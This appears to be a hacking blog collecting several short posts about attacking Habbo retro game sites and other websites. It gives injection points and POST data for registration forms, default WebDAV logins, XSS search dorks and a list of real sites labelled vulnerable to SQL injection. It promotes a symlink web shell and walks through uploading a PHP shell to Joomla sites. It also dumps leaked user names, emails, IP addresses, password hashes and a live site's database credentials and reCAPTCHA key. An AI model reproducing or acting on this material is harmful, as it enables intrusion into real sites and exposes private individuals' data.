SIRP

Habbo Retro Exploits

You also require the “POST data” for uber exploits.
To exploit on uber(If vulnerable), you must first check the register page type.
If using the old register, with green shit use the following url.
(http://www.site.com/register_submit)
The post data is…

bean.avatarName=%Inject_Here%&bean.password=lawl123&bean.retypedPassword=lawl123&bean.email=aelkrwlawr%40awrlawr.com&bean.day=13&bean.month=7&bean.year=1979&bean.parentEmail=&recaptcha_challenge_field=03AHJ_Vusdlhnu-boAW_CfwD97Y3AiIhbdW_KVUI0EfuKsSnteQK3OhdZMrv-yQ1LOW6Ve_83WZBpLpy0It4IIPjK79w4K519N6VLtJ4F94_ERYh3Ci50M9I8LSgHKqT5vKyytcX_VZsaPDvaVnXYXaaKoiPM4_1BqbA&recaptcha_response_field=menticlo+plus&bean.tos=accept

If using the new register, AKA Quick register use the following url.
(http://www.site.com/quickregister/email_password_submit)

And the post data-
bean.name=%Inject_Here%&bean.email=lol@lol.com&bean.password=lawl123&bean.retypedPassword=lawl123&bean.termsOfServiceSelection=accept

For phoenix the url must be
(http://site.com/index.php?error=ban&user=%Inject_Here%)

There are also on xampp retro’s webdav exploit .
(http://www.urlhere.com/webdav/)
Then go to C:/Right click/Add netowrk/It not load not work/URL then connect with these details/

Username:Try xampp or wampp
Password: Try wampp or xampp

Comments Leave a Comment
Categories Uncategorized

Leaked Website Info

16 Sep

============================================================================================================
FirstName LastName Email RegisterIP
Ashleigh Soloff ashleigh@reston.org 74.92.149.53
Casey Gerwin cheweez@cox.net 151.188.18.83
David Tillery dtillery@vt.edu 63.240.230.197
gloria williams-brevard gloria.williams-brevard@dhs.gov 204.248.24.163
Kelly Brink kelly.colleen06@gmail.com 173.73.102.8
Linda Kulas lindamkulas@aol.com 71.178.24.194
Rose Reeser emilyrose9565@yahoo.com 173.30.40.231
Scott Price scott_price@warner.senate.gov 68.33.180.48
Van nguyen ordernghe@gmail.com 98.204.122.162

============================================================================================================

users_name users_email users_password
aaronschwing xingbipu226@tom.com f35364bc808b079853de5a1e343e7159
abrahamlilja iajatlfnd@qq.com f35364bc808b079853de5a1e343e7159
aales nruthimho@qq.com f35364bc808b079853de5a1e343e7159
Aron sparrowa@umich.edu 6b2ba813bd22e59e4c9686f8ad2f62dd
abristerjuli chhumiop@hotmail.com f35364bc808b079853de5a1e343e7159
abxgiqop bqdtwh@veaghp.com d41d8cd98f00b204e9800998ecf8427e
acaillouetshonn fenbim6810@163.com f35364bc808b079853de5a1e343e7159
acashmerpris duanwuy792@yeah.net f35364bc808b079853de5a1e343e7159
accp.abuzar accp.abuzar@gmail.com 44ab1370eb802e0fd277ebf9be94547b
acdrnayp dqreqdwt@tglhaaor.com 02f84fe3b819a76719980fb450e8f8de
aclagettsiren mind644575@tom.com f35364bc808b079853de5a1e343e7159
addix addix@rocketmail.com 9ad9baac83136e85555657133fad7223
adjfeu krnpxb@fsnbhu.com c99cf879980ff418d4d594280ae5fe96
admin asd@asd.asd 1657c7b7a7d2504f66d296ed268b350b
administrator shakir@dodstech.com 098f6bcd4621d373cade4e832627b4f6
adolphgivens ujqlnkbpt@qq.com f35364bc808b079853de5a1e343e7159
adp apradia@rice.edu 0f3285c9363df053024bc3283d8e3b8d
adreamtoshare adreamtoshare@gmail.com d12be6922678eaba31423eacef44824c
adstout aprildstout@gmail.com 0d757ae716d85a409ebecffb6d6e90c1
aemfpbeixj ssveis@mlfgso.com 9a719af46210c6d501757a92479b6f94
afishtk afishtk@yahoo.com 00a8c1ed46901c194e00797cb1b95b4b
afwnhvckt mybdyr@vzldrl.com 5e18da?????bb?2a728810a9d0e0f72c
agexnjk gfapxq@zrazjk.com dc18152094b04c7f31d416c7a33ae09c
aggxei qptyzy@ktgcak.com 894fa41ffc2803e5f926fe2392092ecd
agotjm tepfzj@myjqpb.com 4133e303b91e31ebf381ee8032f223b2
agraffroci bb61702393b@163.com f35364bc808b079853de5a1e343e7159
agriagemike yishuop00301@163.com f35364bc808b079853de5a1e343e7159
aida98775 cherry50806@yahoo.com d41d8cd98f00b204e9800998ecf8427e
aikrainmich zhenrenxgnhps@21cn.com f35364bc808b079853de5a1e343e7159
ailwainelyle duiminj2521@163.com f35364bc808b079853de5a1e343e7159
aitplui egkbiw@jlwfdw.com d41d8cd98f00b204e9800998ecf8427e
ajbertrand ajbertrand@gmail.com beb3e5857e321a80d60af9d3a0d29b31
akoakrobe huanshiug702@21cn.com f35364bc808b079853de5a1e343e7159
Akonyte akonyte@gmail.com 61f6ee9d8938940905e824357d50ed1e
akvzgdszsi snbzyh@bsngjc.com bbecd09a7540fd47d7e94deaacaed382

Comments Leave a Comment
Categories Uncategorized

List of XSS Dorks

16 Sep

nurl:com_feedpostold/feedpost.php?url=

!xss inurl:/products/orkutclone/scrapbook.php?id=

!xss inurl:/products/classified/headersearch.php?sid=

!xss inurl:/poll/default.asp?catid=

!xss inurl:/search_results.php?search=Search&k=

!xss /preaspjobboard//Employee/emp_login.asp?msg1=

!xss pages/match_report.php?mid= pages/match_report.php?mid=

!xss /notice.php?msg= /notice.php?msg=

!xss /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=

!xss /index.php?option=com_easygb&Itemid=

!xss /2wayvideochat/index.php?r=

!xss /view.php?PID= /view.php?PID=

!xss /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=

!xss /showproperty.php?id= /showproperty.php?id=

!xss /vehicle/buy_do_search/?order_direction=

!xss /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=

!xss /winners.php?year=2008&type= /winners.php?year=2008&type=

!xss /schoolmv2/html/studentmain.php?session=

!xss /site_search.php?sfunction= /site_search.php?sfunction=

!xss /search.php?search_keywords= /search.php?search_keywords=

!xss /hexjector.php?site= /hexjector.php?site=

!xss /news.php?id= /news.php?id=

!xss /index.php?view=help&faq=1&ref=

!xss inurl:”contentPage.php?id=”

!xss inurl:”displayResource.php?id=”

!xss intext:”Website by Mile High Creative”

!xss index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations”

!xss /info.asp?page=fullstory&key=1&news_type=news&onvan=

!xss /ser/parohija.php?id= /ser/parohija.php?id=

!xss /strane/pas.php?id= /strane/pas.php?id=

!xss /main.php?sid= /main.php?sid=

Comments Leave a Comment
Categories Uncategorized

List Of SQLI Sites

16 Sep

http://blackhistorycanada.ca/theme.php?id’
http://www.cloudynights.com/item.php?item_id=1052′
http://www.klimt02.net/jewellers/index.php?item_id=11203′
http://www.realestatecoursereviews.com/review/index2.php?item_id=22′
http://www.masshist.org/database/doc-viewer.php?item_id=99′
http://www.sublimefrequencies.com/item.asp?Item_id=34′
http://airwaysmag.com/channels.html?channel_id=16′
http://skills.library.leeds.ac.uk/transcript.php?ID=2′
http://www.seanscottphotography.com.au/shop_category.php?id=6′
http://www.discoverbajacalifornia.com/hotel.php?id=105′
http://www.exploringcostarica.com/ing/hotel.php?id=32′
http://www.firstinfifegolf.com/hotel.php?id=242′
http://www.acalltomen.com/page.php?id=51′
http://www.bcspeakers.com/page.php?id=22′
http://www.rct-net.de/page.php?id=342’&lang=0′
http://www.adas-fusion.eu/theme.php?id=2′
http://www.parahol.com/theme.php?lng_id=1’&id=8′
http://www.twitney.co.uk/theme.php?id=7′
http://apodion.com/vad/section.php?id=10′
http://perkins.pvt.k12.ma.us/museum/section.php?id=214′
http://www.nissi-beach.com/section.php?id=13′
http://www.inuitcircumpolar.com/section.php?ID=6’&Lang=En’&Nav=Section’
http://pch-workshop.com/MemberInfo.php?Id=10′
http://www.abcls.ca/wp-content/themes/abcls/members/memberinfo.php?member_id=548′
http://www.drinksontario.com/memberinfo.php?id=17′
http://www.oiwsba.com/oiwsba/memberinfo.php?id=11′
http://samsungmobilers.ro/post.php?id=91′
http://www.lawetalnews.com/post.php?id=146′
http://ducducnyc.com/productdetail.php?productid=218’&ducid=hcbxcmbkr’
http://hsus.petfulfillment.com/productdetail.php?productid=1334′
http://www.ferobrake.co.za/productdetail.php?id=19′
http://www.jumpking.ca/productDetail.php?ID=14′
http://www.nikwax.com/en-gb/products/productdetail.php?productid=3′
http://www.technotoytuning.com/productdetail.php?p=112′
http://www.truebelieverclothing.com/productdetail.php?id=1′
http://www.yesanime.com/productDetail.php?show=11501′

Comments Leave a Comment
Categories Uncategorized

ibuzzhotel.com MySql Data

16 Sep

<?php
if(!defined(‘IN_INDEX’)) { die(‘Sorry, you cannot access this file.’); }
#Please fill this all out.

#NOTE: To set up TheHabbos.ORG’s API go to wwwroot/mysite/thehabbos_api for IIS, OR, htdocs/thehabbos_api for XAMPP and others.

/*
*
* MySQL management
*
*/

$_CONFIG[‘mysql’][‘connection_type’] = ‘pconnect’; //Type of connection: It must be connect, or pconnect: if you want a persistent connection.

$_CONFIG[‘mysql’][‘hostname’] = ‘localhost’; //MySQL host

$_CONFIG[‘mysql’][‘username’] = ‘root’; //MySQL username

$_CONFIG[‘mysql’][‘password’] = ‘mangos’; //MySQL password

$_CONFIG[‘mysql’][‘database’] = ‘database’; //MySQL database

$_CONFIG[‘mysql’][‘port’] = ‘3306’; //MySQL’s port

/*
*
* Hotel management – All URLs do not end with an “/”
*
*/

$_CONFIG[‘hotel’][‘server_ip’] = ‘5.39.59.2’; //IP of VPS/DEDI/etc

$_CONFIG[‘hotel’][‘url’] = ‘http://ibuzzhotel.com’; //Does not end with a “/”

$_CONFIG[‘hotel’][‘name’] = ‘iBuzz’; // Hotel’s name

$_CONFIG[‘hotel’][‘desc’] = ‘This is a New Retro…Hooray!’; //Hotel’s description

$_CONFIG[‘hotel’][’email’] = ‘hlrules888@hotmail.com’; //Where the help queries from users are emailed to.@Priv skin

$_CONFIG[‘hotel’][‘in_maint’] = false; //False if hotel is NOT in maintenance. True if hotel IS in maintenance

$_CONFIG[‘hotel’][‘motto’] = ‘Please Change Me!’; //Default motto users will register with.

$_CONFIG[‘hotel’][‘credits’] = 25000; //Default number of credits users will register with.

$_CONFIG[‘hotel’][‘pixels’] = 100; //Default number of pixels users will register with.

$_CONFIG[‘hotel’][‘figure’] = ‘ch-635-70.hd-605-1.lg-716-66-62.sh-735-68.hr-515-33’; //Default figure users will register with.

$_CONFIG[‘hotel’][‘web_build’] = ’63_1dc60c6d6ea6e089c6893ab4e0541ee0/990′; //Web_Build

$_CONFIG[‘hotel’][‘external_vars’] = ‘http://ibuzzhotel.com/r63/external_variables.txt’; //URL to your external vars

$_CONFIG[‘hotel’][‘external_texts’] = ‘http://ibuzzhotel.com/r63/external_flash_texts.txt’; //URL to your external texts

$_CONFIG[‘hotel’][‘product_data’] = ‘http://ibuzzhotel.com/r63/productdata.txt’; //URL to your productdata

$_CONFIG[‘hotel’][‘furni_data’] = ‘http://ibuzzhotel.com/r63/furnidata.txt’; //URL to your furnidata

$_CONFIG[‘hotel’][‘swf_folder’] = ‘http://ibuzzhotel.com/r63’; //URL to your SWF folder(does not end with a ‘/’)

/*
*
* Templating management – Pick one of our default styles or make yours by following our examples!
*
*/

#RevCMS has 2 default styles, ‘Mango’ by dannyy94 and ‘Priv’ by joopie – Others styles are to come, such as RastaLulz’s ProCMS style and Nominal’s PhoenixCMS 4.0 style.

$_CONFIG[‘template’][‘style’] = ‘Habbo’;

/*
*
* Other topsites.. thing
*
*/

$_CONFIG[‘thehabbos’][‘username’] = ‘Terrum’;
$_CONFIG[‘retro_top’][‘user’] = ‘Twabbo’;

/*
*
* Recaptcha management – Fill the information below if you have one, else leave it like that and don’t worry, be happy.
*
*/

$_CONFIG[‘recaptcha’][‘priv_key’] = ‘6LcZ58USAAAAABSV5px9XZlzvIPaBOGA6rQP2G43’;
$_CONFIG[‘recaptcha’][‘pub_key’] = ‘6LcZ58USAAAAAAQ6kquItHl4JuTBWs-5cSKzh6DD’;
/*
*
* Social Networking stuff
*
*/

$_CONFIG[‘social’][‘twitter’] = ‘terrum’; //Hotel’s Twitter account

$_CONFIG[‘social’][‘facebook’] = ‘epichosts’; //Hotel’s Facebook account

Comments Leave a Comment
Categories Uncategorized

#How to hide your IP and ensure Anonymous Browsing.

16 Sep

To ensure anonymous browsing please download Hotspot Shield. http://www.hotspotshield.com/

After you download Hotspot Shield your now anonymously browsing the Internet.

If you have any problems please contact Hotspot Shield support as I am not affiliated or endorsed with the application.

Thank you!

Comments Leave a Comment
Categories Uncategorized

#New Symlink Shell

16 Sep

MANNU Shell is GUI based symlink php shell .
download shell from this link
http://www.mediafire.com/?dfn61sm88n1ve1q
Download v 2.0 (password Protected)
http://www.mediafire.com/?6t7np02j7g30hc4

username team
password indishellThis script basically contains following functions
1.generates php.ini file :-
it is to create php.ini file which help us to enable the disabled functions so that we can execute commands

2.Symlink the ROOT directory :-
This option symlink the “/” directory (root directory) and gives the hyperlink to that directory where symlink has done
3.cms based symlink:-
This option provides us the direct link of cms like joomla,wordpress
or you can get public_html diectory hyperlink just by providing website username(once we have done with second option)
4.website and username :-
This function list the website hosted on server with their usernames.
5.username function :-
in case /etc/named.conf has no read permission to list the server website
just provide website name and press enter to get the username of the website

6.command execution :-
you can run commands from this input box

first of all click on “generate php.ini” hyperlink (to enable all the functions on server) and the shell will show
hyperlink which we need to open in new tab and this process will enable the disabled function
and second step is to click on “symlink the root folder” hyperlink to check is server is vulnerable to symlink
when we will click on this option , shell will show hyperlink to “root” directory symlink
open it in new new tab,if we dont get 404 error, means symlink has been done
now you can use third and sixth option.

Comments Leave a Comment
Categories Uncategorized

Protect you’re self :)

16 Sep

Here is an in-detail thread about self-protection from all the intrusions, hack attempts, rats, keylogging, stealing etc.

The basic idea is to have a good army of ANTI’s to protect yourself. You will need the following tools:-
1) Anti-Virus :- Run an Anti-Virus no matter how powerful your system is. Even free ones would do. Below is the list of free topline Anti-Virus.

2) Anti-Malware :- There are two recommendation that i would give. Both of them are free, do a great job and both run on your demand.

3) Host Intrusion Prevention System:- This is also known as HIPS. It can Prevent you from unwanted intrusions like telnet acess etc. My personal recommendation is

Win Patrol

4) Firewall:- Dont forget to run Windows Firewall. If its setup correctly it can block most unwanted intrusions. And you could also run free firewalls out there. Some of the most used ones include

5) Key Scrambler:- Use some free key scramblers to protect yourself from keylogging. And most importantly use a virtual keyboard while typing in passwords of bank logins, paypal login etc.
Some of the free ones are:-

KeyScrambler Personal 2.6

6) Browser Selection:- Internet browsers are personal choice. No matter whatever browser you use, never save any password.
If you want to save passwords, then use the following method:-

Download Mozilla Firefox and install it.
Open Firefox —-> Tools —-> Options —–> Security Tab.
Tick “Remember password for sites” and “Use a master password”.
Type in a master password.

Now each time you goto a login page where the password is saved, it will first ask for the master password, hence protecting your password from stealers.

Comments Leave a Comment
Categories Uncategorized

#Joomla Shell Upload

16 Sep

Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. “myshell”)
3. Copy the shell to the same folder and rename it to “yourshell.php.flv”
4. Now in your folder you have 2 files, “myshell.php” & “myshell.php.flv”.

Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.

Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called “myshell.php.flv”, is to trick the uploader into thinking that you are uploading a FLV file.

Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your “myshell.php.flv”.
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for “myshell.php.flv” then delete the .flv part meaning you will have “myshell.php” left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://%5Bslave%5D/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your “random.php”
6. And your IN!